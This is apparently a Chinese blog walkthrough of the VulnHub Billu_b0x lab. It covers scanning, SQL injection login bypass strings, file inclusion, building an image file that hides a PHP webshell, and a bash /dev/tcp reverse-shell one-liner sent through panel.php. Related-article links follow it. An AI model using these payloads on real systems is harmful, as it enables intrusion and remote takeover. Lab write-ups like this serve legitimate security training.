vulhub-Billu-b0x攻略

靶场下载链接

https://download.vulnhub.com/billu/Billu_b0x.zip

将kali和Billu,NAT连接

获取靶场ip

arp-scan -l

使用diesearch进行目录扫描

dirsearch -u " "

查看目录中的信息

打开add.php

打开head.php

打开in,phpinfo()的信息泄露

允许本地文件包含

打开index.php,登录界面,尝试使用万能密码登录(失败)

' or 1=1#

打开phpmy

打开test.php

使用get请求失败

在kali,使用post请求成功

存在文件包含漏洞和文件下载漏洞

使用此请求方式查看一下index.php

发现了登录的逻辑,明白了为什么万能密码会错误

只要在万能密码的后面加一个\就可以了

打开images,图片上传位置

登录

' or 1=1#\

成功登录

show users 显示用户信息,重点有图片

获取到图片上传的路径

右键点击图片,选择在新标签中打开图像

add 添加用户,上传图片

图片马

新建1.php文件写入一句话木马

随便下载一个图片,放在一起

copy 1.png/b + 1.php/a 2.png

将制作好的图片马上传上去

图片马地址http://192.168.31.138/uploaded_images/2.png

制作反弹shell木马文件

show users 点击continue时进行抓包

echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash

将load改为图片马位置,在panel.php后放代码

在kali中监听8888端口

发送到重放器,点击发送,kali中可监听到shell,反弹shell完成

相关推荐
呉師傅19 分钟前
佳能iR-ADV C5560复印机如何扫描文件到电脑
运维·网络·windows·计算机外设·电脑
麦子邪26 分钟前
C语言中奇技淫巧04-仅对指定函数启用编译优化
linux·c语言·开发语言
半梦半醒*41 分钟前
Linux网络管理
linux·运维·网络·centos·运维开发
破刺不会编程1 小时前
linux线程概念和控制
linux·运维·服务器·开发语言·c++
华强笔记1 小时前
C程序内存布局详解
服务器·c语言
HX4361 小时前
MP - List (not just list)
android·ios·全栈
神秘人X7071 小时前
Linux网络配置全攻略:IP、路由与双机通信
linux·网络·tcp/ip
wxjlkh1 小时前
powershell 批量测试ip 端口 脚本
java·服务器·前端
翟天保Steven2 小时前
Ubuntu-安装Epics教程
linux·ubuntu·epics
Nightwish52 小时前
Linux随记(二十一)
linux·运维·服务器